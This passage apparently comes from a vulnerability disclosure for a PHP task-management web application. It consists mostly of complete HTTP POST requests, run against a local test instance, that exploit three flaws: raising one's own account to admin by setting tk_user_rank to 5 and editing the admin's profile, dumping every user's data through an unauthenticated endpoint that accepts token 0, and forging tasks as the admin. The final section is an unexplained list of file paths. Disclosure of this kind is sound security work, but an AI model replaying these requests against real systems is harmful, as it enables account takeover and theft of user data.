    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    tk_display_name=changed_by_todaro&tk_user_contact=18010101010&tk_user_email=12%40qq.com&tk_user_remark=aaaaaaaaaaaaaaaaaa&tk_user_rank=3&submit=%E4%BF%9D%E5%AD%98&MM_update=form1&ID=1
    

You can modify the information of the admin user.

At the same time, you can upgrade the current user to the admin by modifying tk\_user\_rank to 5 when you modify your own information!

    POST /default_user_edit.php?UID=2 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 183
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    tk_display_name=todaro&tk_user_contact=18010101010&tk_user_email=12%40qq.com&tk_user_remark=aaaaaaaaaaaaaaaaaa&tk_user_rank=5&submit=%E4%BF%9D%E5%AD%98&MM_update=form1&ID=2
    

**\[7\]Sensitive Information Disclosure Vulnerability**

The if\_get\_addbook.php file does not have an authentication operation.

Line 3 reads all the input via php://input; Line 4 decodes the json data; Line 7 checks the token value in json with the check\_token function.

The check\_token function is in /function.class.php:

By default, all users have a token of 0.

So the check\_token function returns the uid of the user whose token is 0, which is the uid of all users by default.

Go back to if\_get\_addbook.php:

Line 11 calls the get\_user\_select function in function.class.php.

POST requests the following data:

    POST /if_get_addbook.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 11
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie:
    
    {"token":0}
    

Return information for all users:

**\[8\]Unauthorized Access Vulnerability**

The default\_task\_add.php file specifies the dispatcher by $_POST[‘csa_create_user’] when assigning the task, and $_POST[‘csa_create_user’] = 1 can forge the task for the admin user.

POST requests the following data:

    POST /default_task_add.php?projectID=1&UID=-1&touser=-1 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 313
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_task_add.php?projectID=1&UID=-1&touser=-1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=1
    
    csa_text=test_admin_create_project_by_todaro&csa_remark1=hhhh&csa_tag=ccccccc&csa_type=20&csa_to_dept=0001&csa_to_user=2&csa_from_dept=0001&csa_from_user=2&csa_create_user=1&csa_last_user=2&plan_start=2018-08-27&plan_end=2018-08-28&plan_hour=&csa_priority=3&csa_temp=3&csa_remark2=2&cont=ffff&MM_insert=form1
    

Created a task for admin through exploits.

**\[9\]**

/control\_file.php

/control\_log.php

/control\_project.php

/control\_task.php

/control\_log.php

/tree.php

/control\_task.php

Tag

#php